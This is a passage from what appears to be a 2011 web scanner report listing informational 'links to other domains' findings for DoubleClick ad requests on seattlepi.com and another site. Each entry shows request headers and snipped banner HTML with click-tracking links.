GET /adi/N1395.132636.7201864412421/B3640803.3;sz=300x250;ord=1316278439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316296513374&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5351
Date: Sat, 17 Sep 2011 16:54:00 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Tue Feb 22 16:27:48 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<a target="_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/v%3B236992785%3B2-0%3B0%3B36806893%3B4307-300/250%3B40847904/40865691/1%3B%3B%7Esscs%3D%3fhttp://www.bbbs.org/"><img src="http://s0.2mdn.net/2276943/adc_BBBS_Biologist_LearnHow_300x250.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...
18.19. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N1395.132636.7201864412421/B3640803.5;sz=728x90;ord=1316279947? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626?t=1316298021960&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5349
Date: Sat, 17 Sep 2011 17:19:07 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Sep 14 10:44:56 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
arget="_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/l%3B227349363%3B4-0%3B0%3B36806931%3B3454-728/90%3B44041251/44059038/1%3B%3B%7Esscs%3D%3fhttp://www.makinghomeaffordable.gov"><img src="http://s0.2mdn.net/2276943/ADC_foreclosure_MHAtrouble_728x90.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...
18.20. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N1395.132636.7201864412421/B3640803.5;sz=728x90;ord=1316278938? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626?t=1316297012354&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5231
Date: Sat, 17 Sep 2011 17:02:20 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Jun 23 16:40:15 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<a target="_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/d%3B226160184%3B0-0%3B0%3B36806931%3B3454-728/90%3B37317974/37335852/1%3B%3B%7Esscs%3D%3fhttp://www.noattacks.org/"><img src="http://s0.2mdn.net/2276943/adc_asthma_bathtoy_728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...
18.21. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N1395.132636.7201864412421/B3640803.5;sz=728x90;ord=1316279621? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626?t=1316297696481&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5264
Date: Sat, 17 Sep 2011 17:13:42 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Apr 20 09:56:28 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<a target="_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/l%3B219254104%3B0-0%3B0%3B36806931%3B3454-728/90%3B41811665/41829452/1%3B%3B%7Esscs%3D%3fhttp://www.handsonlycpr.org"><img src="http://s0.2mdn.net/2276943/adc_CPR_aharevised_728x90.gif" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...
18.22. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N1395.132636.7201864412421/B3640803.5;sz=728x90;ord=1316278462? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61721100?t=1316296535517&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5279
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 17 Sep 2011 16:54:22 GMT
Expires: Sat, 17 Sep 2011 16:54:22 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Jul 20 16:48:58 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<a target="_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/v%3B239387504%3B2-0%3B0%3B36806931%3B3454-728/90%3B41478818/41496605/2%3B%3B%7Esscs%3D%3fhttp://liveunited.org/"><img src="http://s0.2mdn.net/2276943/adc_liveunited_ruth_728x90.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...
18.23. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N1395.132636.7201864412421/B3640803.5;sz=728x90;ord=1316279297? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626?t=1316297371487&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5304
Date: Sat, 17 Sep 2011 17:08:18 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Tue Dec 22 11:55:47 EST 2009 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
ref="http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/n%3B217143885%3B1-0%3B0%3B36806931%3B3454-728/90%3B34832624/34850479/1%3B%3B%7Esscs%3D%3fhttp://www.autismspeaks.org/whatisit/learnsigns.php"><img src="http://s0.2mdn.net/2276943/adc_autism_toni2_728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...
18.24. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N1395.132636.7201864412421/B3640803.5;sz=728x90;ord=1316278452? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626?t=1316296524359&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5236
Set-Cookie: id=c0f63423c0000e0||t=1316280770|et=730|cs=002213fd48c5c0bcbe81bf4c62; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 17:32:50 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 17:32:50 GMT
Date: Sat, 17 Sep 2011 17:32:50 GMT
Expires: Sat, 17 Sep 2011 17:32:50 GMT
Cache-Control: private

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Apr 29 09:56:02 EDT 2009 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
target="_blank" href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/p%3B214976543%3B2-0%3B0%3B36806931%3B3454-728/90%3B31261272/31279148/1%3B%3B%7Esscs%3D%3fhttp://buzzeddriving.adcouncil.org"><img src="http://s0.2mdn.net/2276943/adc_buzzed_hospital_728x90.gif" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...
18.25. http://ad.doubleclick.net/adi/N1558.NetMining/B4742075.6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1558.NetMining/B4742075.6

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/N1558.NetMining/B4742075.6;sz=728x90;ord=1316277729? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://a.netmng.com/hic/?nm_width=728&nm_height=90&nm_publ=140&nm_c=200&beacon=2010june&url=[URL_ENCODED_REFERER]&passback
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 480
Date: Sat, 17 Sep 2011 17:04:47 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b85/0/0/%2a/q;227705298;0-0;0;51521746;3454-728/90;43673321/43691108/1;;~sscs=%3fhttp://store.trendmicro.com/store/tmamer/en_US/pd/productID.147721300/OfferID.7463995509"><img src="http://s0.2mdn.net/viewad/2869519/BlueWhite20Off_728x90_0823.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...
18.26. http://ad.doubleclick.net/adi/N5019.284127.DBGVIDEONETWORK/B5621714  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5019.284127.DBGVIDEONETWORK/B5621714

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N5019.284127.DBGVIDEONETWORK/B5621714;sz=1x1;pc=[TPAS_ID];click=;ord=3597907? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.misquincemag.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1519
Date: Sat, 17 Sep 2011 16:38:27 GMT

<!-- Template Id = 4,228 Template Name = HTML Image Banner + Optional Additional Tracking - [DFA] -->
<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/7/0/%2a/a%3B242752145%3B0-0%3B0%3B65464024%3B31-1/1%3B41491013/41508800/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://www.realwomenofphiladelphia.com" target="_blank">
<img src="http://s0.2mdn.net/1649156/5-1x1.GIF" border="0" alt=""/></a>
...[SNIP]...
</script>

<img src="http://secure-us.imrworldwide.com/cgi-bin/m?ci=kraft-ca&at=view&rt=banner&st=image&ca=5621714&cr=41491013&pc=1028271&ce=65464024&pr=iag.sid,2500010931&pr=iag.tfid,401&pr=iag.pageid,65464024&pr=iag.brn,1649156&pr=iag.cte,place_65464024&pr=iag.cmpid,5621714&pr=iag.stid,1028271&pr=iag.impid,41491013&pr=iag.advid,1649156&r=4392642" />
<iframe width="1" height="1" frameborder="0" src="http://d.agkn.com/iframe!t=747!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=4392642&ent=5621714,65464024,242752145,41491013"></iframe>
18.27. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6257.274732.SEATTLEPI-NNN/B5824230.2

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N6257.274732.SEATTLEPI-NNN/B5824230.2;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NXBiYXZsYyhnaWQkOWI2Njc3M2MtZTE0Zi0xMWUwLTllYjktOGY3ZTRjMWRlNjJiLHN0JDEzMTYyNzkyODQ2OTU3OTYsc2kkMjM2OTA1MSx2JDEuMCxhaWQkUWxSZm1rUzBxUXctLGN0JDI1LHlieCRvREJZM1JiVjFNY2w1SEtJdTRjZi5nLHIkMCkp/0/*;mtfIFrameRequest=false;ord=1316279284.748935? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1152
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 17 Sep 2011 17:08:21 GMT
Expires: Sat, 17 Sep 2011 17:08:21 GMT
Discarded: true

<html><head><title>CLICK THIS</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 4,228 Template Name = HTML Image Banner + Optional Additional Tracking - [DFA] -->
<a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NXBiYXZsYyhnaWQkOWI2Njc3M2MtZTE0Zi0xMWUwLTllYjktOGY3ZTRjMWRlNjJiLHN0JDEzMTYyNzkyODQ2OTU3OTYsc2kkMjM2OTA1MSx2JDEuMCxhaWQkUWxSZm1rUzBxUXctLGN0JDI1LHlieCRvREJZM1JiVjFNY2w1SEtJdTRjZi5nLHIkMCkp/0/*http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/7/fd/%2a/s%3B245527708%3B0-0%3B0%3B70481828%3B4307-300/250%3B43996418/44014205/1%3B%3B%7Esscs%3D%3fhttp://adready.com/campaign_event/click/13409941?h=03aa6f56b6aa5e19a914" target="_blank">
<img src="http://s0.2mdn.net/2772323/131584596716325.jpg" border="0" alt=""/>
</a>
...[SNIP]...
18.28. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6257.274732.SEATTLEPI-NNN/B5824230.2

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N6257.274732.SEATTLEPI-NNN/B5824230.2;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NWxmM3Z2aihnaWQkMDM3N2Y2NDgtZTE0Yi0xMWUwLTk0OTItYjdjNWQwOTA3N2Y4LHN0JDEzMTYyNzczMTE4MTAwMzIsc2kkMjM2OTA1MSx2JDEuMCxhaWQkYUdxaVJFUzBxeWctLGN0JDI1LHlieCRPSjV4QU9jckNHZzNsUURkaWpJcG13LHIkMCkp/0/*;mtfIFrameRequest=false;ord=1316277311.859313? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1152
Date: Sat, 17 Sep 2011 16:53:07 GMT

<html><head><title>CLICK THIS</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 4,228 Template Name = HTML Image Banner + Optional Additional Tracking - [DFA] -->
<a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NWxmM3Z2aihnaWQkMDM3N2Y2NDgtZTE0Yi0xMWUwLTk0OTItYjdjNWQwOTA3N2Y4LHN0JDEzMTYyNzczMTE4MTAwMzIsc2kkMjM2OTA1MSx2JDEuMCxhaWQkYUdxaVJFUzBxeWctLGN0JDI1LHlieCRPSjV4QU9jckNHZzNsUURkaWpJcG13LHIkMCkp/0/*http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/7/fd/%2a/s%3B245527708%3B0-0%3B0%3B70481828%3B4307-300/250%3B43996418/44014205/1%3B%3B%7Esscs%3D%3fhttp://adready.com/campaign_event/click/13409941?h=03aa6f56b6aa5e19a914" target="_blank">
<img src="http://s0.2mdn.net/2772323/131584596716325.jpg" border="0" alt=""/>
</a>
...[SNIP]...
18.29. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6257.274732.SEATTLEPI-NNN/B5824230.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N6257.274732.SEATTLEPI-NNN/B5824230.3;sz=728x90;dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NWY3cGUwdihnaWQkMDM3N2Y2NDgtZTE0Yi0xMWUwLTk0OTItYjdjNWQwOTA3N2Y4LHN0JDEzMTYyNzczMTE4MTAwMzIsc2kkMjM2OTA1MSx2JDEuMCxhaWQkREhTaVJFUzBxeWctLGN0JDI1LHlieCRPSjV4QU9jckNHZzNsUURkaWpJcG13LHIkMCkp/0/*;mtfIFrameRequest=false;ord=1316277311.859706? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1152
Date: Sat, 17 Sep 2011 16:35:12 GMT

<html><head><title>CLICK THIS</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 4,228 Template Name = HTML Image Banner + Optional Additional Tracking - [DFA] -->
<a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NWY3cGUwdihnaWQkMDM3N2Y2NDgtZTE0Yi0xMWUwLTk0OTItYjdjNWQwOTA3N2Y4LHN0JDEzMTYyNzczMTE4MTAwMzIsc2kkMjM2OTA1MSx2JDEuMCxhaWQkREhTaVJFUzBxeWctLGN0JDI1LHlieCRPSjV4QU9jckNHZzNsUURkaWpJcG13LHIkMCkp/0/*http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/7/fd/%2a/p%3B245527721%3B0-0%3B0%3B70481843%3B3454-728/90%3B43996437/44014224/1%3B%3B%7Esscs%3D%3fhttp://adready.com/campaign_event/click/13409951?h=03aa6f56b6aa5e19a914" target="_blank">
<img src="http://s0.2mdn.net/2772323/1315845984811807.jpg" border="0" alt=""/>
</a>
...[SNIP]...
18.30. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6257.274732.SEATTLEPI-NNN/B5824230.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N6257.274732.SEATTLEPI-NNN/B5824230.3;sz=728x90;dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NW81dDdtayhnaWQkZmI0NmM3ODgtZTE0YS0xMWUwLThlNWItNTMyMTA0ZTljMGRjLHN0JDEzMTYyNzcyOTgwNjU4NjAsc2kkMjM2OTA1MSx2JDEuMCxhaWQkOFBGMVVrUzBxdXctLGN0JDI1LHlieCR2V3BLVkVtMjcySW8zVXc5RlFvc1R3LHIkMCkp/0/*;mtfIFrameRequest=false;ord=1316277298.128471? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1152
Date: Sat, 17 Sep 2011 16:35:07 GMT

<html><head><title>CLICK THIS</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 4,228 Template Name = HTML Image Banner + Optional Additional Tracking - [DFA] -->
